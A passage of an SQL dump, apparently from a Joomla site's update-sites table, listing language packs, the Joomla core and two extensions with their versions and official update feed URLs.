(395, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(396, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(397, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(398, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(399, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(400, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(401, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(402, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(403, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(404, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(405, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(406, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(407, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(408, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(409, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(410, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(411, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(412, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(413, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(414, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(415, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(416, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(417, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(418, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(419, 18, 0, 'JCE 2.7.14', '', 'pkg_jce', 'package', '', 0, '2.7.14', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-14-released', ''),
(420, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(421, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(422, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(423, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(424, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(425, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(426, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(427, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(428, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(429, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(430, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(431, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(432, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(433, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(434, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(435, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(436, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(437, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(438, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(439, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(440, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(441, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(442, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(443, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(444, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(445, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(446, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(447, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(448, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(449, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(450, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(451, 18, 0, 'JCE 2.7.14', '', 'pkg_jce', 'package', '', 0, '2.7.14', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-14-released', ''),
(452, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.9', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(453, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(454, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(455, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.9.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(456, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(457, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(458, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.9.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(459, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.9.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(460, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(461, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(462, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(463, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(464, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(465, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(466, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.9.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(467, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.9.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(468, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(469, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.9.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(470, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(471, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(472, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(473, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(474, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.9.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(475, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(476, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.9.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(477, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(478, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.9.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(479, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.9.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(480, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.9.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(481, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.9.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(482, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(483, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(484, 18, 0, 'JCE 2.7.14', '', 'pkg_jce', 'package', '', 0, '2.7.14', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-14-released', ''),
(485, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(486, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(487, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(488, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(489, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(490, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(491, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(492, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(493, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(494, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(495, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(496, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(497, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(498, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(499, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(500, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(501, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(502, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(503, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(504, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(505, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(506, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(507, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(508, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(509, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(510, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(511, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(512, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(513, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(514, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(515, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(516, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(517, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(518, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(519, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.9.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(520, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(521, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(522, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(523, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(524, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(525, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(526, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(527, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(528, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(529, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(530, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(531, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(532, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(533, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(534, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(535, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(536, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(537, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(538, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(539, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(540, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(541, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(542, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(543, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(544, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(545, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(546, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(547, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(548, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(549, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(550, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(551, 18, 0, 'JCE 2.7.15', '', 'pkg_jce', 'package', '', 0, '2.7.15', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-15-released', ''),
(552, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(553, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(554, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(555, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(556, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(557, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(558, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(559, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.10', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(560, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(561, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(562, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(563, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(564, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(565, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(566, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.9.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(567, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(568, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(569, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(570, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(571, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(572, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
